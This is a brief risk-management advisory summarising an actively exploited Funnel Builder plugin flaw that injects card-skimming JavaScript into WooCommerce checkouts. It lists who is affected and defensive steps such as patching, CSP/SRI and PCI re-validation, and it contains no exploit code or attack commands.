Critical Funnel Builder Plugin Vulnerability Enables WooCommerce Checkout Skimming
What Happened – A zero‑day flaw in the WordPress Funnel Builder plugin is being actively exploited to inject malicious JavaScript into WooCommerce checkout pages. The script harvests payment‑card details and forwards them to attacker‑controlled servers.
Why It Matters for TPRM –
- Direct exposure of cardholder data breaches PCI‑DSS obligations and can trigger costly fines.
- The exploit targets a widely‑used third‑party plugin, meaning any vendor that bundles or recommends Funnel Builder inherits the risk.
- Active exploitation indicates a short window for remediation; delayed action amplifies liability.
Who Is Affected – Retail & e‑commerce sites running WordPress + WooCommerce that have installed the Funnel Builder plugin; managed service providers that host such sites; any supply‑chain partner that relies on the compromised plugin for checkout flows.
Recommended Actions –
- Immediately apply the security patch released by the plugin author or disable/remove Funnel Builder.
- Enforce a strict Content‑Security‑Policy (CSP) and Subresource‑Integrity (SRI) on checkout pages to block unauthorized scripts.
- Conduct a forensic review of recent checkout transactions for signs of data exfiltration.
- Re‑validate PCI‑DSS compliance and update third‑party risk registers to reflect the new vulnerability.
Technical Notes – The flaw is a server‑side input‑validation bypass that allows arbitrary JavaScript injection (a classic stored XSS). No CVE has been assigned yet, but security firm Sansec has confirmed active exploitation in the wild. Affected data includes full payment‑card numbers, expiration dates, and CVV codes. Source: The Hacker News